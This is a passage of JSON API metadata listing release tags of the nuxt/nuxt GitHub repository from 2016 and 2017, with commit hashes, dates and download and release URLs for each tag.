rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5